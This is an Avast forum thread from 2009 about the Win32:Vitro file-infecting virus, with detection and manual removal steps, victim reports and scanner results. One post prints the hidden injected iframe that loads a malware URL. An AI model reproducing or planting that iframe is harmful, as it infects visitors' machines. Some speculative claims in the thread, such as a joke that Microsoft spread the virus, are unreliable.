Author Topic: Malware name Win32:Vitro  (Read 340229 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Malware name Win32:Vitro
« Reply #165 on: March 13, 2009, 01:37:52 PM »
Hi Tech,

For what you try to do, try to follow next instructions, better for you, do not mess up with firewall settings:
Step 1: Find the winlogon.exe process ID
Open up the task manager (right click on the task bar and select 'Task manager')
Enable the PID (process ID) column. By default, the task manager does not list the running process ID. If you don't have it:
In the program menu, select View->Select columns... A select columns dialog should appear.
Check the box next to PID and click on OK to apply the change.
Go to the process list (the Process tab in the task manager)
Look for winlogon.exe in the 'Image Name' column and record down its associated PID.
Step 2: Check to see if winlogon is establishing any suspicious connections. It should not be connecting to any external location.
Open up a command line window (Start->Run..., then execute 'cmd' to open a command line window).
List all the active net connections on your PC. In the command line window, type 'netstat -a -o'. This will list out all the active connections and the process that used them.
Look for the winlogon.exe process ID in the active connections list. If you see it, you're infected.

In some cases the infection can be connected to an IP address hosted at someplace.net (some domain). The 'fake' winlogon.exe is deployed in windows\winlogon.exe instead of windows\system32\winlogon.exe. The virus can't replace the original because it's a fundamental part of your O/S.

If you have the virus, here's how you clean it manually. Note, this is not for the faint hearted (you are not Tech!).
Step 1: Stop the fake winlogon.exe process from launching
Launch the registry editor (Start->Run, then execute 'regedit').
Go to My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Look for the 'Shell' entry. The original entry should say only say 'Explorer.exe'. If it says 'Explorer.exe c:\windows\winlogon.exe' or something to that effect, you need to change it back to just say 'Explorer.exe'.
Make a note of where the fake winlogon.exe is deployed to. We're going to erase the file in the next step.
Step 2: Boot in windows safe mode
Restart the operating system.
While it's booting, hold down F8. It should bring up the boot menu.
Select the Safe mode option and follow through on all the menus until the operating system launches.
If you're successful, the desktop should have the words 'safe mode' or something to that effect displayed.
Step 3: Delete the infection
Go to the offending file location. For me it was c:\windows\winlogon.exe. WARNING: DO NOT DELETE c:\windows\system32\winlogon.exe - this is the original O/S winlogon executable.
Delete the file. If you're not able to delete it, then the infection is active and you'll need to start from the beginning again.
Once it's deleted, reboot your machine as normal.
Step 4: Verify that the infection is clean by following the detection instructions.

I hope this will help you and all the others,

polonus (malware fighter)

Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Malware name Win32:Vitro
« Reply #166 on: March 13, 2009, 04:34:23 PM »
Hi malware fighters,

Got word from Giorgio Maone, about the protection against the code on websites through NoScript installed on Firefox or Flock browser. He writes:
Quote
unless the terminal domain installing the nefarious code is in your whitelist, you're protected by NoScript
So again NoScript fully protects the online user against going to this vector code,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: Malware name Win32:Vitro
« Reply #167 on: March 13, 2009, 06:05:03 PM »
Hi malware fighters,

Got word from Giorgio Maone, about the protection against the code on websites through NoScript installed on Firefox or Flock browser. He writes:
Quote
unless the terminal domain installing the nefarious code is in your whitelist, you're protected by NoScript
So again NoScript fully protects the online user against going to this vector code,

polonus
Keep your list as short as you can ;)
The best things in life are free.

partzeus

  • Guest
Re: Malware name Win32:Vitro
« Reply #168 on: March 17, 2009, 11:51:12 PM »
Has anyone come up with a cure for this virus? Granted I love the business but I do not love the fact I am destroying peoples data to get them up and running again. When will a cure come out for this virus please?

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: Malware name Win32:Vitro
« Reply #169 on: March 18, 2009, 02:31:18 PM »
When will a cure come out for this virus please?
There isn't a cure for it... right now, only prevention: safe browsing and habits, update OS and antivirus. avast blocks a lot of their variants.
The best things in life are free.

mojako_2you

  • Guest
Re: Malware name Win32:Vitro
« Reply #170 on: March 18, 2009, 02:44:51 PM »
Virut...

So hard to disinfect this virus...

But in my experience only one of my friends infected by this virus...

Donno where he got the virus...

But as I know this virus infected .exe packaging file....

Im know taking high precaution by select read only for my executeable file or .exe in my pendrive as my file and installer has been infected before from my members laptop....

But I think I manage to remove this virus by just taken file exclude the .exe file into a pendrive... dont use portablehard disk as it maybe go to system volume information....

Good luck....hehehehehe

Im noobs only..

Insaniac

  • Guest
Re: Malware name Win32:Vitro
« Reply #171 on: March 24, 2009, 07:26:58 AM »
I had the same problem..
I tried AVG's and Norton's virut removers with no luck, in addition to malwarebytes and Dr. Web's CureIt. Nothing seemed to help, really.
I went with formatting and rebuilding from CDs, but I backed up everything after being infected. But it seemed to go nice. Then I opened adobe photoshop and avast blocked that jl.chura.pl again. I looked around at some html files connected to photoshop, and uploaded one of them to virustotal.com. Btw, the inserted iframe in all of my infected htmls and phps is a little different from what people have been writing around. It was the following:

<iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe>

Maybe it's because of those signs and numbers in the middle of the URL that Avast didn't detect it? Strangely enough, when I tried sending one infected file to my own email, gmail had already cleansed it (without actually saying so anywhere), and removed the iframe part. Come on, you Avast developing people, make Avast even better by updating it to kill this thing. I'm looking for infected exes in my infected backups.

Here are the results from virustotal for a certainly infected file including the above quoted iframe:
AntiVir   7.9.0.120   2009.03.23   HTML/Infected.WebPage.Gen
CAT-QuickHeal   10.00   2009.03.24   HTML/Iframe.AYJ
McAfee-GW-Edition   6.7.6   2009.03.23   Heuristic.Script.Infected.WebPage
Sophos   4.39.0   2009.03.24   Troj/Fujif-Gen

All other AVs, including Avast and a couple of other McAfee versions, don't find anything. I tried full system scan with AntiVir, but it's useless since it simply deletes the html files instead of cleaning them. One may find the infected files with this but send them through gmail to get them cleansed.. Hehe, long process.

I'm trying this Sophos thing on my infected backups today, maybe that's the solution to this..

partzeus

  • Guest
Re: Malware name Win32:Vitro
« Reply #172 on: March 25, 2009, 01:34:14 AM »
What I find strange is the forum was crazy with posts a couple weeks ago and now nothing. I upgraded to Vista and now I am beta testing Windows 7 and no problems. Go figure. I wonder why there is no interest in cleaning this virus?

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88900
  • No support PMs thanks
Re: Malware name Win32:Vitro
« Reply #173 on: March 25, 2009, 01:47:11 AM »
It is not that there is a lack of interest in cleaning it but it uses two levels of encryption by all accounts and changes its form each time it infects another file, so it isn't a simple task.

I think the key has been to try and stop it get established.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

dwarf0921

  • Guest
Re: Malware name Win32:Vitro
« Reply #174 on: March 25, 2009, 08:55:01 PM »
What I find strange is the forum was crazy with posts a couple weeks ago and now nothing. I upgraded to Vista and now I am beta testing Windows 7 and no problems. Go figure. I wonder why there is no interest in cleaning this virus?

Maybe Microsoft put the Virus out, and it doesn't affect the upcoming windows 7. So now everyone will be forced to upgrade to Windows 7. Dun Dun Dunnn....

On a more serious note, I too have gotten the virus (actually my Grandma's Computer) but I wanted to know if it is safe to back up MPEG and JPEG files from the computer. These are the only things I'm concerned about, because this computer has pictures and videos from my sister's wedding. I am asking about this because I have heard that it supposedly infects MP3 and WMV files.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Malware name Win32:Vitro
« Reply #175 on: March 25, 2009, 10:41:37 PM »
Hi dwarf0921,

Well the virus does not attack Vista etc. because there the attack vector is being stopped by another added security layer that we have/had not available in WinXP, but to accuse M$ of a sort of upgrade forcing malware is just slanderous. I think if the malcreants get to know Vista like they know the workings of XP's Windows File Protection etc., they would not have hesitated to launch such a file infector as well.
And why should users on XP upgrade to Vista or Windows 7, but " once bitten twice shy" have chosen for another not vulnerable platform like Ubuntu etc.
I think it is true that generally the Internet is under attack by parties that hold the view that Internet should never have become public, but while we have it that would not be M$ interest,
....and where files and extensions are concerned Win32:Vitro tries to infect all, but does not do a very good job of that, and being buggy there makes removal even worse than a nightmare,

polonus
« Last Edit: March 25, 2009, 10:47:12 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Blalok

  • Guest
Re: Malware name Win32:Vitro
« Reply #176 on: April 02, 2009, 08:58:20 PM »
Actually I have been attacked on Windows Vista. My GData Virus Scan did not find anything checking the downloaded file (it scans every file i want to download first, and then it gets actually downloaded by my FF3 in an instant). I'm not sure whether the virus broke out before being checked by GData (as every scan requires a downloading), or if GData just didn't find it. Anyway the scan afterwards revealed ~130 infected .exe files, containing e.g. explorer.exe, taskmgr.exe and some other essential files. That's were I changed to Safe Mode (too late). I cannot open taskmanager (the tray icon appears but I can't actually open it), control panel is blocked. Even the cmd does not work as the commands seem to be infected as well.

CureIt did not find anything (I used it in the way Polonus described it on page 4 of this thread).

Boot discs don't work, because I have my system completely encrypted with Truecrypt. I did not dare to decrypt it yet. If you want me to I could do it as I am changing back to Ubuntu for sure (as i tested Viste just because it came with my laptop). So I'm quite happy I had my sensitive data on another encrypted external volume which wasn't connected during or after the infection. I would be happy to be able to rescue some pdfs, rars, docs and mpgs (pictures). Oh yeah and some videos (mpeg and avi). In two rar archives I have some mp3s (about 20 files). Burned all that on a DVD. How do you consider the chance that I can use them securely? How shall I proceed?

As I mentioned before I can give you more information as I have nothing important to lose. But you have to consider that I do not know much more than the basics for efficient use of OSs, not more. So if you want me to do something then give me instructions people not fighting everyday with tcpip protocols can understand.

Thanks :)


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Malware name Win32:Vitro
« Reply #177 on: April 02, 2009, 09:40:13 PM »
Hi Blalok,

That is strange that the virus got you on an OS that is known to be not vulnerable through special added File Protection etc. by Vista, but it might be the very encryption you used for protection that became your undoing.
Nothing left to repair there I think with more than a gross of infected executables, just follow the ffr method, that is  f-disk, format and re-install or if you switch over to another distro, a total recall of the machine at hand. Also make sure that you change all your passwords, log-in accounts etc, as this machine was severely compromised, and enjoy life after Windows, not much you can do, really now, thanks for your report,

polonus (malware fighter)



« Last Edit: April 02, 2009, 09:42:06 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Arch Angel

  • Guest
Re: Malware name Win32:Vitro
« Reply #178 on: April 03, 2009, 09:18:26 AM »
Polonus,  Thanks for the tips and the interesting but over-my-head reading.

Will it be safe to move HTM files from the original machine's HD?
And is the act of copying and moving enough to trigger an infection to spread?
All I want to copy are .doc, .mp3, and .htm files.  The .htm files are negotiable.

Finally, I would like to know how I can tell if the USB drive is infected.  I've got stick it in SOMETHING to reformat it.
Any hints?

Hi

Got the virus from a client's pc while trasfering files to my server so i could format the Hdd and insert another 500Gig Hdd
Main thing was that when i transfered a program to my Laptop via Lan and ran it things went crazy.

Laptop was redone more than 7 times and ts gone why so many re-do's lol
(each time I used some of the backups on the server.)oops!

The last time i re did the laptop I saw in posts to not use ANY FILES FROM ANY BACKUP UNLESS SCANNED
So i scanned and tranfered via Memory stick.

NOW........ Last nite i copied some other files first scanning them with my FAV Antivirus (AVAST!) hehehe
copied to mem stick moved it to my laptop ..no problems.
Later I Scaaned an small folder with HTML files in and no virus, I moved them to my Laptop and opend the HTML file
WHAT A MISTAKE!!!!

The first thing Avast picked up was "Sign Of "Win32:Trojan-Gen{Other} has been found in *path*
I deleted it - then all went pear shaped ....

Sign of "Win32:Vitro has been found c:\windows\systemm32\NOTEPAD.EXE"

then accwiz.exe etc etc....... arrrrrrgghhhh
I wanted to fly down and strangle the clever idiot who wrote this thing.

My laptop (the one im using now) is infected
No files are being murderd at this stage because of the setting that allows or denies write acces to the files the system uses - so for now i am safe in that its not spreading.

I opend the code in the HTML fiel i opend and there it was an Iframe with code next to it - BASTARD
PLEASE DO NOT COPY HTML FILES FROM ANY BACKUP IT CONTAINS THE CODE TO IMPLEMENT THE VIRUS ON YOUR SYSTEM!

sigh.... so i guess i am re doing my machine ...AGAIN today -

HINT FOR ANY DEVELOPERS OUT THERE : I am realy thinking a "Virtual Machine" is my next option becuase the Dot Net 2008 and SQL 2008 takes hours to install
 ;D

Cheers












Need_O2

  • Guest
Re: Malware name Win32:Vitro
« Reply #179 on: April 06, 2009, 02:04:28 PM »
that thing got me too
weirdly avast finds all the exes those are infected but cant find what is infecting them
anyway I was moving them to quarantine which including LogonUI32.exe then poof windows never opened again
(yes I checked all hard drives in boot scan mode)
result: format